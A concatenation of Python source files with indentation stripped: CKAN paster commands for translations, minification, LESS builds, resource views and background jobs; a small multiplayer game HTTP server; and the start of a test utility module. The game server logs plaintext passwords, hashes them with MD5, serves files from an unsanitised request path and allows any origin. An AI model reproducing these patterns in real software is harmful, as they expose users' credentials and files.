extract_reg_ex = '(\%\([^\)]*\)' + spf_reg_ex + \
'|\[\d*\:[^\]]*\]' + \
'|\{[^\}]*\}' + \
'|<[^>}]*>' + \
'|\%((\d)*\$)?' + spf_reg_ex + ')'
for entry in po:
msg = entry.msgid.encode('utf-8')
matches = re.finditer(extract_reg_ex, msg)
length = len(msg)
position = 0
translation = u''
for match in matches:
translation += '-' * (match.start() - position)
position = match.end()
translation += match.group(0)
translation += '-' * (length - position)
entry.msgstr = translation
out_dir = os.path.join(self.i18n_path, 'zh_TW', 'LC_MESSAGES')
try:
os.makedirs(out_dir)
except OSError:
pass
po.metadata['Plural-Forms'] = "nplurals=1; plural=0\n"
out_po = os.path.join(out_dir, 'ckan.po')
out_mo = os.path.join(out_dir, 'ckan.mo')
po.save(out_po)
po.save_as_mofile(out_mo)
print 'zh_TW has been mangled'
class MinifyCommand(CkanCommand):
'''Create minified versions of the given Javascript and CSS files.
Usage:
paster minify [--clean] PATH
for example:
paster minify ckan/public/base
paster minify ckan/public/base/css/*.css
paster minify ckan/public/base/css/red.css
if the --clean option is provided any minified files will be removed.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 1
exclude_dirs = ['vendor']
def __init__(self, name):
super(MinifyCommand, self).__init__(name)
self.parser.add_option('--clean', dest='clean',
action='store_true', default=False,
help='remove any minified files in the path')
def command(self):
clean = getattr(self.options, 'clean', False)
self._load_config()
for base_path in self.args:
if os.path.isfile(base_path):
if clean:
self.clear_minifyed(base_path)
else:
self.minify_file(base_path)
elif os.path.isdir(base_path):
for root, dirs, files in os.walk(base_path):
dirs[:] = [d for d in dirs if not d in self.exclude_dirs]
for filename in files:
path = os.path.join(root, filename)
if clean:
self.clear_minifyed(path)
else:
self.minify_file(path)
else:
# Path is neither a file or a dir?
continue
def clear_minifyed(self, path):
path_only, extension = os.path.splitext(path)
if extension not in ('.css', '.js'):
# This is not a js or css file.
return
if path_only.endswith('.min'):
print 'removing %s' % path
os.remove(path)
def minify_file(self, path):
'''Create the minified version of the given file.
If the file is not a .js or .css file (e.g. it's a .min.js or .min.css
file, or it's some other type of file entirely) it will not be
minifed.
:param path: The path to the .js or .css file to minify
'''
path_only, extension = os.path.splitext(path)
if path_only.endswith('.min'):
# This is already a minified file.
return
if extension not in ('.css', '.js'):
# This is not a js or css file.
return
path_min = fanstatic_resources.min_path(path)
source = open(path, 'r').read()
f = open(path_min, 'w')
if path.endswith('.css'):
f.write(rcssmin.cssmin(source))
elif path.endswith('.js'):
f.write(rjsmin.jsmin(source))
f.close()
print "Minified file '{0}'".format(path)
class LessCommand(CkanCommand):
'''Compile all root less documents into their CSS counterparts
Usage:
paster less
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 0
def command(self):
self.less()
custom_css = {
'fuchsia': '''
@layoutLinkColor: #E73892;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'green': '''
@layoutLinkColor: #2F9B45;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'red': '''
@layoutLinkColor: #C14531;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'maroon': '''
@layoutLinkColor: #810606;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
}
def less(self):
''' Compile less files '''
import subprocess
command = 'npm bin'
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output = process.communicate()
directory = output[0].strip()
less_bin = os.path.join(directory, 'lessc')
root = os.path.join(os.path.dirname(__file__), '..', 'public', 'base')
root = os.path.abspath(root)
custom_less = os.path.join(root, 'less', 'custom.less')
for color in self.custom_css:
f = open(custom_less, 'w')
f.write(self.custom_css[color])
f.close()
self.compile_less(root, less_bin, color)
f = open(custom_less, 'w')
f.write('// This file is needed in order for ./bin/less to compile in less 1.3.1+\n')
f.close()
self.compile_less(root, less_bin, 'main')
def compile_less(self, root, less_bin, color):
print 'compile %s.css' % color
import subprocess
main_less = os.path.join(root, 'less', 'main.less')
main_css = os.path.join(root, 'css', '%s.css' % color)
command = '%s %s %s' % (less_bin, main_less, main_css)
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output = process.communicate()
class FrontEndBuildCommand(CkanCommand):
'''Creates and minifies css and JavaScript files
Usage:
paster front-end-build
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 0
def command(self):
self._load_config()
# Less css
cmd = LessCommand('less')
cmd.command()
# js translation strings
cmd = TranslationsCommand('trans')
cmd.options = self.options
cmd.args = ('js',)
cmd.command()
# minification
cmd = MinifyCommand('minify')
cmd.options = self.options
root = os.path.join(os.path.dirname(__file__), '..', 'public', 'base')
root = os.path.abspath(root)
ckanext = os.path.join(os.path.dirname(__file__), '..', '..', 'ckanext')
ckanext = os.path.abspath(ckanext)
cmd.args = (root, ckanext)
cmd.command()
class ViewsCommand(CkanCommand):
'''Manage resource views.
Usage:
paster views create [options] [type1] [type2] ...
Create views on relevant resources. You can optionally provide
specific view types (eg `recline_view`, `image_view`). If no types
are provided, the default ones will be used. These are generally
the ones defined in the `ckan.views.default_views` config option.
Note that on either case, plugins must be loaded (ie added to
`ckan.plugins`), otherwise the command will stop.
paster views clear [options] [type1] [type2] ...
Permanently delete all views or the ones with the provided types.
paster views clean
Permanently delete views for all types no longer present in the
`ckan.plugins` configuration option.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 1
def __init__(self, name):
super(ViewsCommand, self).__init__(name)
self.parser.add_option('-y', '--yes', dest='assume_yes',
action='store_true',
default=False,
help='''Automatic yes to prompts. Assume "yes"
as answer to all prompts and run non-interactively''')
self.parser.add_option('-d', '--dataset', dest='dataset_id',
action='append',
help='''Create views on a particular dataset.
You can use the dataset id or name, and it can be defined multiple times.''')
self.parser.add_option('--no-default-filters',
dest='no_default_filters',
action='store_true',
default=False,
help='''Do not add default filters for relevant
resource formats for the view types provided. Note that filters are not added
by default anyway if an unsupported view type is provided or when using the
`-s` or `-d` options.''')
self.parser.add_option('-s', '--search', dest='search_params',
action='store',
default=False,
help='''Extra search parameters that will be
used for getting the datasets to create the resource views on. It must be a
JSON object like the one used by the `package_search` API call. Supported
fields are `q`, `fq` and `fq_list`. Check the documentation for examples.
Not used when using the `-d` option.''')
def command(self):
self._load_config()
if not self.args:
print self.usage
elif self.args[0] == 'create':
view_plugin_types = self.args[1:]
self.create_views(view_plugin_types)
elif self.args[0] == 'clear':
view_plugin_types = self.args[1:]
self.clear_views(view_plugin_types)
elif self.args[0] == 'clean':
self.clean_views()
else:
print self.usage
_page_size = 100
def _get_view_plugins(self, view_plugin_types,
get_datastore_views=False):
'''
Returns the view plugins that were succesfully loaded
Views are provided as a list of ``view_plugin_types``. If no types are
provided, the default views defined in the ``ckan.views.default_views``
will be created. Only in this case (when the default view plugins are
used) the `get_datastore_views` parameter can be used to get also view
plugins that require data to be in the DataStore.
If any of the provided plugins could not be loaded (eg it was not added
to `ckan.plugins`) the command will stop.
Returns a list of loaded plugin names.
'''
from ckan.lib.datapreview import (get_view_plugins,
get_default_view_plugins
)
log = logging.getLogger(__name__)
view_plugins = []
if not view_plugin_types:
log.info('No view types provided, using default types')
view_plugins = get_default_view_plugins()
if get_datastore_views:
view_plugins.extend(
get_default_view_plugins(get_datastore_views=True))
else:
view_plugins = get_view_plugins(view_plugin_types)
loaded_view_plugins = [view_plugin.info()['name']
for view_plugin in view_plugins]
plugins_not_found = list(set(view_plugin_types) -
set(loaded_view_plugins))
if plugins_not_found:
error('View plugin(s) not found : {0}. '.format(plugins_not_found)
+ 'Have they been added to the `ckan.plugins` configuration'
+ ' option?')
return loaded_view_plugins
def _add_default_filters(self, search_data_dict, view_types):
'''
Adds extra filters to the `package_search` dict for common view types
It basically adds `fq` parameters that filter relevant resource formats
for the view types provided. For instance, if one of the view types is
`pdf_view` the following will be added to the final query:
fq=res_format:"pdf" OR res_format:"PDF"
This obviously should only be used if all view types are known and can
be filtered, otherwise we want all datasets to be returned. If a
non-filterable view type is provided, the search params are not
modified.
Returns the provided data_dict for `package_search`, optionally
modified with extra filters.
'''
from ckanext.imageview.plugin import DEFAULT_IMAGE_FORMATS
from ckanext.textview.plugin import get_formats as get_text_formats
from ckanext.datapusher.plugin import DEFAULT_FORMATS as \
datapusher_formats
filter_formats = []
for view_type in view_types:
if view_type == 'image_view':
for _format in DEFAULT_IMAGE_FORMATS:
filter_formats.extend([_format, _format.upper()])
elif view_type == 'text_view':
formats = get_text_formats(config)
for _format in itertools.chain.from_iterable(formats.values()):
filter_formats.extend([_format, _format.upper()])
elif view_type == 'pdf_view':
filter_formats.extend(['pdf', 'PDF'])
elif view_type in ['recline_view', 'recline_grid_view',
'recline_graph_view', 'recline_map_view']:
if datapusher_formats[0] in filter_formats:
continue
for _format in datapusher_formats:
if '/' not in _format:
filter_formats.extend([_format, _format.upper()])
else:
# There is another view type provided so we can't add any
# filter
return search_data_dict
filter_formats_query = ['+res_format:"{0}"'.format(_format)
for _format in filter_formats]
search_data_dict['fq_list'].append(' OR '.join(filter_formats_query))
return search_data_dict
def _update_search_params(self, search_data_dict):
'''
Update the `package_search` data dict with the user provided parameters
Supported fields are `q`, `fq` and `fq_list`.
If the provided JSON object can not be parsed the process stops with
an error.
Returns the updated data dict
'''
log = logging.getLogger(__name__)
if not self.options.search_params:
return search_data_dict
try:
user_search_params = json.loads(self.options.search_params)
except ValueError, e:
error('Unable to parse JSON search parameters: {0}'.format(e))
if user_search_params.get('q'):
search_data_dict['q'] = user_search_params['q']
if user_search_params.get('fq'):
if search_data_dict['fq']:
search_data_dict['fq'] += ' ' + user_search_params['fq']
else:
search_data_dict['fq'] = user_search_params['fq']
if (user_search_params.get('fq_list') and
isinstance(user_search_params['fq_list'], list)):
search_data_dict['fq_list'].extend(user_search_params['fq_list'])
def _search_datasets(self, page=1, view_types=[]):
'''
Perform a query with `package_search` and return the result
Results can be paginated using the `page` parameter
'''
n = self._page_size
search_data_dict = {
'q': '',
'fq': '',
'fq_list': [],
'include_private': True,
'rows': n,
'start': n * (page - 1),
}
if self.options.dataset_id:
search_data_dict['q'] = ' OR '.join(
['id:{0} OR name:"{0}"'.format(dataset_id)
for dataset_id in self.options.dataset_id]
)
elif self.options.search_params:
self._update_search_params(search_data_dict)
elif not self.options.no_default_filters:
self._add_default_filters(search_data_dict, view_types)
if not search_data_dict.get('q'):
search_data_dict['q'] = '*:*'
query = p.toolkit.get_action('package_search')(
{}, search_data_dict)
return query
def create_views(self, view_plugin_types=[]):
from ckan.lib.datapreview import add_views_to_dataset_resources
log = logging.getLogger(__name__)
datastore_enabled = 'datastore' in config['ckan.plugins'].split()
loaded_view_plugins = self._get_view_plugins(view_plugin_types,
datastore_enabled)
context = {'user': self.site_user['name']}
page = 1
while True:
query = self._search_datasets(page, loaded_view_plugins)
if page == 1 and query['count'] == 0:
error('No datasets to create resource views on, exiting...')
elif page == 1 and not self.options.assume_yes:
msg = ('\nYou are about to check {0} datasets for the ' +
'following view plugins: {1}\n' +
' Do you want to continue?')
confirm = query_yes_no(msg.format(query['count'],
loaded_view_plugins))
if confirm == 'no':
error('Command aborted by user')
if query['results']:
for dataset_dict in query['results']:
if not dataset_dict.get('resources'):
continue
views = add_views_to_dataset_resources(
context,
dataset_dict,
view_types=loaded_view_plugins)
if views:
view_types = list(set([view['view_type']
for view in views]))
msg = ('Added {0} view(s) of type(s) {1} to ' +
'resources from dataset {2}')
log.debug(msg.format(len(views),
', '.join(view_types),
dataset_dict['name']))
if len(query['results']) < self._page_size:
break
page += 1
else:
break
log.info('Done')
def clear_views(self, view_plugin_types=[]):
log = logging.getLogger(__name__)
if not self.options.assume_yes:
if view_plugin_types:
msg = 'Are you sure you want to delete all resource views ' + \
'of type {0}?'.format(', '.join(view_plugin_types))
else:
msg = 'Are you sure you want to delete all resource views?'
result = query_yes_no(msg, default='no')
if result == 'no':
error('Command aborted by user')
context = {'user': self.site_user['name']}
logic.get_action('resource_view_clear')(
context, {'view_types': view_plugin_types})
log.info('Done')
def clean_views(self):
names = []
for plugin in p.PluginImplementations(p.IResourceView):
names.append(str(plugin.info()['name']))
results = model.ResourceView.get_count_not_in_view_types(names)
if not results:
print 'No resource views to delete'
return
print 'This command will delete.\n'
for row in results:
print '%s of type %s' % (row[1], row[0])
result = query_yes_no('Do you want to delete these resource views:', default='no')
if result == 'no':
print 'Not Deleting.'
return
model.ResourceView.delete_not_in_view_types(names)
model.Session.commit()
print 'Deleted resource views.'
class ConfigToolCommand(paste.script.command.Command):
'''Tool for editing options in a CKAN config file
paster config-tool <default.ini> <key>=<value> [<key>=<value> ...]
paster config-tool <default.ini> -f <custom_options.ini>
Examples:
paster config-tool default.ini sqlalchemy.url=123 'ckan.site_title=ABC'
paster config-tool default.ini -s server:main -e port=8080
paster config-tool default.ini -f custom_options.ini
'''
parser = paste.script.command.Command.standard_parser(verbose=True)
default_verbosity = 1
group_name = 'ckan'
usage = __doc__
summary = usage.split('\n')[0]
parser.add_option('-s', '--section', dest='section',
default='app:main', help='Section of the config file')
parser.add_option(
'-e', '--edit', action='store_true', dest='edit', default=False,
help='Checks the option already exists in the config file')
parser.add_option(
'-f', '--file', dest='merge_filepath', metavar='FILE',
help='Supply an options file to merge in')
def command(self):
import config_tool
if len(self.args) < 1:
self.parser.error('Not enough arguments (got %i, need at least 1)'
% len(self.args))
config_filepath = self.args[0]
if not os.path.exists(config_filepath):
self.parser.error('Config filename %r does not exist.' %
config_filepath)
if self.options.merge_filepath:
config_tool.config_edit_using_merge_file(
config_filepath, self.options.merge_filepath)
options = self.args[1:]
if not (options or self.options.merge_filepath):
self.parser.error('No options provided')
if options:
for option in options:
if '=' not in option:
error(
'An option does not have an equals sign: %r '
'It should be \'key=value\'. If there are spaces '
'you\'ll need to quote the option.\n' % option)
try:
config_tool.config_edit_using_option_strings(
config_filepath, options, self.options.section,
edit=self.options.edit)
except config_tool.ConfigToolError, e:
error(e)
class JobsCommand(CkanCommand):
'''Manage background jobs
Usage:
paster jobs worker [--burst] [QUEUES]
Start a worker that fetches jobs from queues and executes
them. If no queue names are given then the worker listens
to the default queue, this is equivalent to
paster jobs worker default
If queue names are given then the worker listens to those
queues and only those:
paster jobs worker my-custom-queue
Hence, if you want the worker to listen to the default queue
and some others then you must list the default queue explicitly:
paster jobs worker default my-custom-queue
If the `--burst` option is given then the worker will exit
as soon as all its queues are empty.
paster jobs list [QUEUES]
List currently enqueued jobs from the given queues. If no queue
names are given then the jobs from all queues are listed.
paster jobs show ID
Show details about a specific job.
paster jobs cancel ID
Cancel a specific job. Jobs can only be canceled while they are
enqueued. Once a worker has started executing a job it cannot
be aborted anymore.
paster jobs clear [QUEUES]
Cancel all jobs on the given queues. If no queue names are
given then ALL queues are cleared.
paster jobs test [QUEUES]
Enqueue a test job. If no queue names are given then the job is
added to the default queue. If queue names are given then a
separate test job is added to each of the queues.
'''
summary = __doc__.split(u'\n')[0]
usage = __doc__
min_args = 0
def __init__(self, *args, **kwargs):
super(JobsCommand, self).__init__(*args, **kwargs)
try:
self.parser.add_option(u'--burst', action='store_true',
default=False,
help=u'Start worker in burst mode.')
except OptionConflictError:
# Option has already been added in previous call
pass
def command(self):
self._load_config()
try:
cmd = self.args.pop(0)
except IndexError:
print(self.__doc__)
sys.exit(0)
if cmd == u'worker':
self.worker()
elif cmd == u'list':
self.list()
elif cmd == u'show':
self.show()
elif cmd == u'cancel':
self.cancel()
elif cmd == u'clear':
self.clear()
elif cmd == u'test':
self.test()
else:
error(u'Unknown command "{}"'.format(cmd))
def worker(self):
from ckan.lib.jobs import Worker
Worker(self.args).work(burst=self.options.burst)
def list(self):
data_dict = {
u'queues': self.args,
}
jobs = p.toolkit.get_action(u'job_list')({}, data_dict)
for job in jobs:
if job[u'title'] is None:
job[u'title'] = ''
else:
job[u'title'] = u'"{}"'.format(job[u'title'])
print(u'{created} {id} {queue} {title}'.format(**job))
def show(self):
if not self.args:
error(u'You must specify a job ID')
id = self.args[0]
try:
job = p.toolkit.get_action(u'job_show')({}, {u'id': id})
except logic.NotFound:
error(u'There is no job with ID "{}"'.format(id))
print(u'ID: {}'.format(job[u'id']))
if job[u'title'] is None:
title = u'None'
else:
title = u'"{}"'.format(job[u'title'])
print(u'Title: {}'.format(title))
print(u'Created: {}'.format(job[u'created']))
print(u'Queue: {}'.format(job[u'queue']))
def cancel(self):
if not self.args:
error(u'You must specify a job ID')
id = self.args[0]
try:
p.toolkit.get_action(u'job_cancel')({}, {u'id': id})
except logic.NotFound:
error(u'There is no job with ID "{}"'.format(id))
print(u'Cancelled job {}'.format(id))
def clear(self):
data_dict = {
u'queues': self.args,
}
queues = p.toolkit.get_action(u'job_clear')({}, data_dict)
queues = (u'"{}"'.format(q) for q in queues)
print(u'Cleared queue(s) {}'.format(u', '.join(queues)))
def test(self):
from ckan.lib.jobs import DEFAULT_QUEUE_NAME, enqueue, test_job
for queue in (self.args or [DEFAULT_QUEUE_NAME]):
job = enqueue(test_job, [u'A test job'], title=u'A test job', queue=queue)
print(u'Added test job {} to queue "{}"'.format(job.id, queue))
|
simple_http_server.py
|
'''
Simple HTTP Server
Copyright 2018 Jacques Gasselin
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import http
import http.server
import uuid
import urllib.parse
import json
import sys
import os
class HttpAuthException(Exception):
pass
class ServerInstance(object):
def __init__(self, db):
self.__db = db
self.__db.open()
def close(self):
self.__db.close()
def connect(self, handler, game):
print("CONNECT game %s" % game)
connectionUUID = self.__db.connect(handler.client_address[0], game)
return { "connectionToken" : str(connectionUUID) }
def login(self, handler, connection, localDevice):
print("LOGIN connection %s on device %s " % (connection, localDevice))
localPlayer = self.__db.login(connection, localDevice)
displayName = self.__db.getPlayerDisplayName(connection, localPlayer)
friendCode = self.__db.getPlayerFriendCode(connection, localPlayer)
authenticated = self.__db.isLocalPlayerAuthenticated(connection, localPlayer)
return { "localPlayerToken" : str(localPlayer),
"displayName" : str(displayName),
"friendCode" : str(friendCode),
"authenticated" : 1 if authenticated else 0}
def httpauthenticate(self, handler, connection, localPlayer):
if not 'Authorization' in handler.headers:
raise HttpAuthException()
auth = handler.headers['Authorization']
import base64
auth_type, auth_bytes = auth.split(" ")
username, password = base64.standard_b64decode(auth_bytes.encode()).decode().split(":")
print("username:", username)
print("password:", password)
import hashlib
md5 = hashlib.md5()
md5.update(username.encode())
md5.update(b':')
md5.update(password.encode())
if self.__db.authenticateLocalPlayer(connection, localPlayer, "HTTP " + auth_type, username, md5.hexdigest()):
displayName = self.__db.getPlayerDisplayName(connection, localPlayer)
friendCode = self.__db.getPlayerFriendCode(connection, localPlayer)
authenticated = self.__db.isLocalPlayerAuthenticated(connection, localPlayer)
return { "localPlayerToken" : str(localPlayer),
"displayName" : str(displayName),
"friendCode" : str(friendCode),
"authenticated" : 1 if authenticated else 0}
return { "localPlayerToken" : "",
"displayName" : "",
"friendCode" : "",
"authenticated" : 0 }
def writeplayerdata(self, handler, connection, localPlayer, data):
print("WRITE PLAYER DATA '%s' FOR player %s ON connection %s " % (str(data), localPlayer, connection))
success = self.__db.writePlayerData(connection, localPlayer, data)
return "1".encode() if success else "0".encode()
def readplayerdata(self, handler, connection, localPlayer, data = None):
print("READ PLAYER DATA FOR player %s ON connection %s " % (localPlayer, connection))
data = self.__db.readPlayerData(connection, localPlayer)
return data
def writeplayerdisplayname(self, handler, connection, localPlayer, displayName):
print("WRITE displayName '%s' FOR player %s ON connection %s " % (displayName, localPlayer, connection))
success = self.__db.setPlayerDisplayName(connection, localPlayer, displayName)
return { "status" : 1 if success else 0 }
def readplayerdisplayname(self, handler, connection, localPlayer, displayName = None):
print("READ displayName FOR player %s ON connection %s " % (localPlayer, connection))
displayName = self.__db.getPlayerDisplayName(connection, localPlayer)
return { "displayName" : str(displayName) }
def readplayerfriendcode(self, handler, connection, localPlayer):
print("READ friendCode for player %s ON connection %s " % (localPlayer, connection))
friendCode = self.__db.getPlayerFriendCode(connection, localPlayer)
return { "friendCode" : str(friendCode) }
def addplayerfriend(self, handler, connection, localPlayer, friendCode):
print("ADD friend with friendCode %s to player %s ON connection %s " % (friendCode, localPlayer, connection))
success = self.__db.addFriendToLocalPlayer(connection, localPlayer, friendCode)
return { "status" : 1 if success else 0 }
def listplayerfriends(self, handler, connection, localPlayer):
print("LIST friends for player %s ON connection %s " % (localPlayer, connection))
friendsAndNames = self.__db.listPlayerFriends(connection, localPlayer)
friends = [{ 'remotePlayerToken' : str(s), 'displayName' : n} for s, n in friendsAndNames]
return { "friends" : friends }
def createsession(self, handler, connection, localPlayer, displayName=None):
print("CREATE session '%s' FOR player %s ON connection %s " % (displayName if displayName else "<auto>", localPlayer, connection))
localSessionUUID = self.__db.createSession(connection, localPlayer, displayName)
displayName = self.__db.getSessionDisplayName(connection, localSessionUUID)
shareCode = self.__db.getSessionShareCode(connection, localSessionUUID)
return { "localSessionToken" : str(localSessionUUID), "displayName" : displayName, "shareCode" : shareCode }
def joinsession(self, handler, connection, localPlayer, sessionCode):
print("JOIN session '%s' FOR player %s ON connection %s " % (sessionCode, localPlayer, connection))
localSessionUUID = self.__db.joinSession(connection, localPlayer, sessionCode)
displayName = self.__db.getSessionDisplayName(connection, localSessionUUID)
shareCode = self.__db.getSessionShareCode(connection, localSessionUUID)
return { "localSessionToken" : str(localSessionUUID), "displayName" : displayName, "shareCode" : shareCode }
def leavesession(self, handler, connection, localPlayer, session):
print("LEAVE session '%s' FOR player %s ON connection %s " % (session, localPlayer, connection))
success = self.__db.leaveSession(connection, localPlayer, session)
return { "status" : 1 if success else 0 }
def writesessiondata(self, handler, connection, session, data):
print("WRITE SESSION DATA '%s' FOR session %s ON connection %s " % (str(data), session, connection))
success = self.__db.writeSessionData(connection, session, data)
return "1".encode() if success else "0".encode()
def readsessiondata(self, handler, connection, session):
print("READ SESSION DATA FOR session %s ON connection %s " % (session, connection))
data = self.__db.readSessionData(connection, session)
return data
def readsessiondisplayname(self, handler, connection, session):
print("READ displayName FOR session %s ON connection %s " % (session, connection))
displayName = self.__db.getSessionDisplayName(connection, session)
return { "displayName" : str(displayName) }
def writesessiondisplayname(self, handler, connection, session, displayName):
print("WRITE displayName '%s' FOR session %s ON connection %s " % (displayName, session, connection))
success = self.__db.setSessionDisplayName(connection, session, displayName)
return { "status" : 1 if success else 0 }
def listsessionplayers(self, handler, connection, session):
print("LIST players for session %s ON connection %s " % (session, connection))
players = self.__db.listSessionPlayers(connection, session)
return { "players" : players }
def listplayersessions(self, handler, connection, localPlayer):
print("LIST sessions for player %s ON connection %s " % (localPlayer, connection))
sessionsNamesAndCodes = self.__db.listPlayerSessions(connection, localPlayer)
sessions = [{ 'localSessionToken' : str(s), 'displayName' : n, 'shareCode' : c } for s, n, c in sessionsNamesAndCodes]
return { "sessions" : sessions }
class PickleServerInstance(ServerInstance):
def __init__(self):
dbPath = os.path.expanduser("~/.multiplay-pickle.db")
print("loading backend from ", dbPath)
from backend import PickleBackend as Backend
ServerInstance.__init__(self, Backend(dbPath))
class Sqlite3ServerInstance(ServerInstance):
def __init__(self):
dbPath = os.path.expanduser("~/.multiplay-sqlite3.db")
print("loading backend from ", dbPath)
from backend import Sqlite3Backend as Backend
ServerInstance.__init__(self, Backend(dbPath))
class RequestHandler(http.server.BaseHTTPRequestHandler):
serverInstance = None
def _parse_GET(self):
if '?' in self.path:
command, argumentString = self.path.split("?")
else:
command = self.path
argumentString = ""
argumentValueByName = {}
if len(argumentString) > 0:
arguments = argumentString.split("&")
for arg in arguments:
try:
name, value = arg.split("=")
except ValueError:
name = arg
value = ""
argumentValueByName[name] = urllib.parse.unquote_plus(value)
command, format = os.path.splitext(command)
if format:
argumentValueByName['response'] = format[1:]
return command.lower(), argumentValueByName
def _write_content(self, content):
if content:
if len(content) >= 128: # Pick some value for which gzip is worth it
if 'Accept-Encoding' in self.headers:
if 'gzip' in self.headers['Accept-Encoding']:
import gzip
content = gzip.compress(content)
self.send_header('Content-Encoding', 'gzip')
self.send_header('Content-Length', str(len(content)))
# CORS support
self.send_header('Access-Control-Allow-Origin', "*")
self.end_headers()
self.wfile.write(content)
else:
self.end_headers()
def _GET_json(self, response):
if isinstance(response, bytes):
try:
rstr = response.decode().strip()
response = json.loads(rstr)
except json.decoder.JSONDecodeError as e:
self.send_response(400)
self.end_headers()
self.wfile.write(str(e).encode())
self.wfile.write('\n'.encode())
self.wfile.write(response)
return
self.send_response(200)
self.send_header("Content-type", "application/json")
content = ("%s\n" % json.dumps(response)).encode()
self._write_content(content)
def _GET_html(self, response):
self.send_response(200)
self.send_header("Content-type", "text/html")
self._write_content(response.encode())
def _GET_binary(self, response):
self.send_response(200)
self.send_header("Content-type", "application/octet-stream")
self._write_content(response)
def _respond_error(self, code, error, format="json"):
if format == "json":
self.send_response(code)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(('{ "error" : "%s" }\n' % str(error)).encode())
else:
self.send_response(code)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(('error=%s\n' % str(error)).encode())
def _GET_www_resource(self):
rootPath = self.server.site_root_path
if '?' in self.path:
path, argumentString = self.path.split("?")
else:
path = self.path
argumentString = ""
# path has a prefix of / which would fail os.path.join
filePath = os.path.join(rootPath, path[1:])
try:
with open(filePath, "rb") as f:
data = f.read()
self.send_response(200)
if path.endswith(".html"):
self.send_header("Content-type", "text/html")
elif path.endswith(".css"):
self.send_header("Content-type", "text/css")
elif path.endswith(".js"):
self.send_header("Content-type", "application/javascript")
elif path.endswith(".png"):
self.send_header("Content-type", "image/png")
elif path.endswith(".ico"):
self.send_header("Content-type", "image/x-icon")
self._write_content(data)
except FileNotFoundError as e:
self.send_response(400)
self.end_headers()
self.wfile.write(str(e).encode())
def do_GET(self):
print("GET")
try:
command, argumentValueByName = self._parse_GET()
except ValueError as e:
self._respond_error(400, e)
return
format = argumentValueByName.pop("response", "binary")
instance = RequestHandler.serverInstance
try:
func = getattr(instance, command[1:])
except AttributeError as e:
self._GET_www_resource()
return
try:
response = func(self, **argumentValueByName)
print("-> ", response)
except HttpAuthException as e:
self.send_response(401)
self.send_header("WWW-Authenticate", 'Basic realm="multiplay"')
self.end_headers()
self.wfile.write(str("0").encode())
return
except TypeError as e:
self._respond_error(400, e, format)
return
except ValueError as e:
self._respond_error(400, e, format)
return
try:
if format == "html":
self._GET_html(response)
elif format == "ico":
self._GET_ico(response)
elif format == "json":
self._GET_json(response)
else:
self._GET_binary(response)
except TypeError as e:
print(e)
self._respond_error(400, e, format)
def do_POST(self):
print("POST")
__httpd = None
def run(port, useSSL = False):
__serverInstanceClass = Sqlite3ServerInstance
if 'pickle' in sys.argv:
__serverInstanceClass = PickleServerInstance
RequestHandler.serverInstance = __serverInstanceClass()
server_address = ('', port)
try:
with http.server.ThreadingHTTPServer(server_address, RequestHandler) as httpd:
global __httpd
if useSSL:
import ssl
#openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365
httpd.socket = ssl.wrap_socket (httpd.socket,
keyfile=os.path.expanduser('~/.ssh/multiplay-server-key.pem'),
certfile=os.path.expanduser('~/.ssh/multiplay-server-cert.pem'),
server_side=True)
print("serving at https://", httpd.server_address)
else:
print("serving at http://localhost:%i" % port)
print("API test at http://localhost:%i/application/test.html" % port)
print("chat client at http://localhost:%i/application/chat.html" % port)
print("tictactoe at http://localhost:%i/application/tictactoe.html" % port)
__httpd = httpd
currentFilePath = os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__)))
httpd.site_root_path = os.path.realpath(os.path.join(currentFilePath, '..', '..', '..', 'www'))
print("loading resources from ", httpd.site_root_path)
httpd.serve_forever()
except KeyboardInterrupt: # silly special cases that don't derive from Exception for common Unix ways to kill threads
pass
except Exception as e:
print(e)
finally:
if RequestHandler.serverInstance:
RequestHandler.serverInstance.close()
def runOnThread(port):
import threading
t = threading.Thread(target=run, args=(port,), daemon=True)
t.start()
import time
time.sleep(0.1)
def shutdown():
global __httpd
httpd = __httpd
if httpd:
httpd.shutdown()
if RequestHandler.serverInstance:
RequestHandler.serverInstance.close()
if __name__ == "__main__":
port = 12345
useSSL = False
for i, arg in enumerate(sys.argv):
if arg == '-p' or arg == '--port':
port = int(sys.argv[i + 1])
if arg == '--https':
useSSL = True
run(port, useSSL)
|
utils.py
|
import glob
import hashlib
import logging
import os
import shutil
import subprocess
from functools import wraps
from tempfile import gettempdir
from threading import Thread
import requests
from timeout_decorator import timeout
from utils.constants import Constant
from utils.format import Format
logger = logging.getLogger('testrunner')
_stepdepth = 0
def step(f):
